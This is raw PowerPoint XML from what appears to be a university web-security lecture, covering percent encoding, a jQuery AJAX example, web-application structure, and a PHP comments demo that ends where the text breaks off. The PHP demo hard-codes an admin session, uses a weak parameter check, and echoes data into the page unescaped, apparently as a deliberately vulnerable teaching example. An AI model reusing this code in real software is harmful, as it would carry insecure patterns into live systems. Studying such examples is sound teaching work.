            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>console.log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>("After Request");</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15147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3 at 10.05.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28966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4" name="Picture 3" descr="Screen Shot 2015-02-03 at 10.05.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5373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7" name="Picture 6" descr="Screen Shot 2015-02-03 at 10.05.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6769817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5.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7844283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4" name="Picture 3" descr="Screen Shot 2015-02-03 at 10.0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2787027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6.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2878603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6.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58127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Percent Encoding</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Must be used to encode anything that is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" noProof="0"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t> of the following:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" noProof="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Alpha [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>a-zA-Z</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" noProof="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Digit [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>0-9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" noProof="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" noProof="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" noProof="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" noProof="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" noProof="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" noProof="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>_ </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" noProof="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" noProof="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>~</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35120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6.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5817475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17.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20847217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18.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17232052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1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73" y="0"/>
            <a:ext cx="8374054" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9459043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1.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94218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="214122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960733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4450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19440703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1584"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="265656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1.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19605377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4" name="Picture 3" descr="Screen Shot 2015-02-03 at 10.0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78736"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="191625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Percent Encoding</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Encode a byte outside the range with percent sign (%) followed by hexadecimal representation of byte</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>&amp; -&gt; %26</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>% -&gt; %25</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>&lt;space&gt; -&gt; %20</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Let’s fix our previous example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>https://example.com/test/example:1.html?/adam</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>https://example.com/test/example%3A1.html?%2Fadam</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1947945" y="2592579"/>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989925" y="2991437"/>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87490" y="3390295"/>
            <a:ext cx="644386" cy="3988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7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4450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6129247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0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1"/>
            <a:ext cx="9144000" cy="5778736"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20938786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20.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10"/>
            <a:ext cx="9144000" cy="5778736"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10047034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XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jQuery</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&lt;title&gt;AJAX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>jQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> Example&lt;/title&gt;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&lt;h1&gt;AJAX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>jQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> Example&lt;/h1&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    &lt;div id='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>insert_here</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>'&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    &lt;/div&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    &lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>="https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ajax.googleapis.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ajax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/libs/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>jquery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/1.11.2/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>jquery.min.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    &lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    &lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	  $.get( "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ajax_test.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>", function( data ) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	    $( "#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>insert_here</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>" ).html( data );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	  });</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;/body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38740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8" end="1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3 at 1.1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0"/>
            <a:ext cx="8757599" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20890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a:t>Adam Doupé, Security and Vulnerability Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="Screen Shot 2015-02-03 at 1.04.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85906"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="148917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Asynchronous JavaScript and XML – AJAX </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can now make web applications that asynchronously fetch only the required data from the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can also respond to user input (clicks, form), and potentially load data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First reference to the term AJAX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>web.archive.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/web/20050223021343/http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>adaptivepath.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/publications/essays/archives/000385.php	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17423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Design a Web Application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Depends on the framework you use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CGI applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One single file that responds to multiple path </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>infos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ala</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Assignment 1 Part 3)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Multiple files that each respond to their own path</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PHP applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Typically many files that correspond 1-1 with a URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ASP applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Classic ASP is the same as PHP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2142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&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>session_start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$_SESSION['username'] = 'admin';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>username_param</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = $_GET['username'];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>if ($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>username_param</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> != $_SESSION['username'])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   if ($_SESSION['username'] != 'admin')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	  echo "&lt;h1&gt;Sorry, you can only view your own comments.&lt;/h1&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	  exit(0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$username = $_SESSION['username'];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16257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0000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;h1&gt;CS 177 Comments&lt;/h1&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;h2&gt;Welcome &lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> echo $username; ?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;p&gt;for debugging purposes you are: &lt;span id='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>userinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>'&gt;&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
